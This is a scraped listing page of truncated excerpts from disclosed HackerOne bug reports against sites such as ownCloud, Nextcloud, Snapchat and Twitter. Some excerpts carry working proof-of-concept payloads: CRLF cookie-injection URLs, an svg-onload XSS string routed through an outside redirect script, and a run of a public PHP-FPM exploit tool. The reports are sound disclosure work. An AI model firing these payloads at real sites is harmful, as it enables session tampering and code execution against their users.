
HackerOne Reports

Search through disclosed security reports

10,350 reports found
Showing 1861 - 1880
This bug was reported directly to GitHub Security Lab.
## Summary: GitHub is a truly awesome service, but it is unwise to put any sensitive data in code that is hosted on GitHub and similar services, as I was able to find internal data. As responsible disclosure I wanted to share it like this the only channel to do …
This bug was reported directly to GitHub Security Lab.
**Summary:** Long ago, I had an account on HackerOne that is now deleted. I used the alias email provided by H1 to sign up on a site for bug testing. To my surprise, I received an email to my account routed from an alias email that should not exist. **Description:** ### …
**PoC**: `http://doc.owncloud.org/%23%0dSet-Cookie:crlf=injection;domain=.owncloud.org;`

**HTTP Response**:

```
HTTP/1.1 301 Moved Permanently\r\n
Date: Wed, 27 Jul 2016 07:58:47 GMT\r\n
Server: Apache\r\n
Location: https://doc.owncloud.org/#\r < injection \r
Set-Cookie:crlf=injection;domain=.owncloud.org;\r\n
```

**Result**: Creating a cookie-param "crlf=injection" on *.owncloud.org

This vulnerability could be used in combination with others. For example, XSS via Cookie, bypass Double Submit Cookie …

**PoC**: `https://api.owncloud.org/%23%0dSet-Cookie:crlf=injection2;domain=.owncloud.org;`

**HTTP Response**:

```
HTTP/1.1 301 Moved Permanently\r\n
Date: Wed, 27 Jul 2016 10:28:01 GMT\r\n
Server: Apache\r\n
Strict-Transport-Security: max-age=63072000\r\n
X-Xss-Protection: 1; mode=block\r\n
Location: https://doc.owncloud.org/api/#\r < injection \r
Set-Cookie:crlf=injection;domain=.owncloud.org;\r\n
```

**Result**: Creating a cookie-param "crlf=injection" on *.owncloud.org

This vulnerability could be used in combination with others. For example, XSS via …

Hi! It's still possible to use an invalid `dir` param to spoof messages in the directory breadcrumbs area. For example, you can use URL-encoded periods to bypass the directory traversal prevention. By referencing a path that returns a 301, you can add a message in the dir param F108266: https://demo.nextcloud.com/index.php/apps/files/?dir=%2E%2E/%2E%2E/%2E%2E/.well-known/caldav/Error%20-%20please%20restart%20your%20computer%20to%20continue …
lmx
Hi Team, Description: When a user has access to some feature like orders, Transfer etc. where a comment section is available. Suppose a staff member comments in it. Now the owner of the account limited access to orders, then he won't be able to access his comments and he won't …
Hi Team, Note: I have reported multiple issues related to information which were closed as N/A due to some information lack. But this issue will look similar by title but it's different than other issues. Before testing anything I have ensured that all other permissions are limited for …
**PoC** (Internet Explorer, Edge):

```
https://blackfan.ru/x?r=https://forum.owncloud.org/<svg/onload=alert(document.domain)>/%252e%252e
```

blackfan.ru/x?r - simple redirection script that is necessary for exploitation

**HTTP Response**:

```html
<div class="panel" id="message">
    <div class="inner">
        <h2 class="message-title">Information</h2>
        <p>No route found for "GET /<svg/onload=alert(document.domain)>/%2e%2e"</p>
    </div>
</div>
```

Hey team, I've found a Snapchat CDN domain here which had a test instance of Fastly set up but did not remove the DNS record when the service was cancelled. This allowed me to create a Fastly instance to take it over. I've confirmed this is a Snapchat property via Censys …
**Hello** In Twitter you can create cards to generate leads. For example: https://twitter.com/i/cards/tfw/v1/759046372544741376?cardname=promotion&autoplay_disabled=true&earned=true&lang=en&card_height=357 If you visit the above URL and click the button, your email and username are sent to my domain. Since this page is missing X-FRAME-HEADERS, a user could simply iframe the URL and could steal victim's emails. …
This issue is exploitable under either of two conditions: * If an API exposed to the main world via contextBridge can return an object or array that contains a JS object which cannot be serialized, for instance, a canvas rendering context. This would normally result in an exception being thrown …
The CVE-2019-11043 vulnerability can be exploited in the latest nextcloud:fpm image. This is due to the specific nginx configuration recommended for nextcloud:

https://github.com/nextcloud/docker#base-version---fpm
https://github.com/nextcloud/documentation/blob/master/admin_manual/installation/nginx.rst
https://github.com/nextcloud/docker/blob/master/.examples/docker-compose/with-nginx-proxy/mariadb/fpm/web/nginx.conf

Here's the exploit: https://github.com/neex/phuip-fpizdam

Sample exploit run:

```
# ./phuip-fpizdam http://localhost:8080/ocs/v2.php
2019/10/22 19:36:29 Base status code is 200
2019/10/22 19:36:30 Status code 502 for qsl=1765, adding …
```

**Description:** Multiple information exposure vulnerabilities were identified in a Jira Server instance (unauthenticated access to APIs and system browser functions). This report describes a combination of two separate vulnerabilities in two separate services. This chain of vulnerabilities allows an unauthenticated attacker to run arbitrary code on a server inside the company's …
**Summary:** Hi @security @zerotea, Hope you are doing well. Today I have found a special edge case where the names are still visible despite "Redact the names of the involved users" is selected on export as .pdf report. This is similar to the resolved reports #2109009 and #2054222. But this …
japz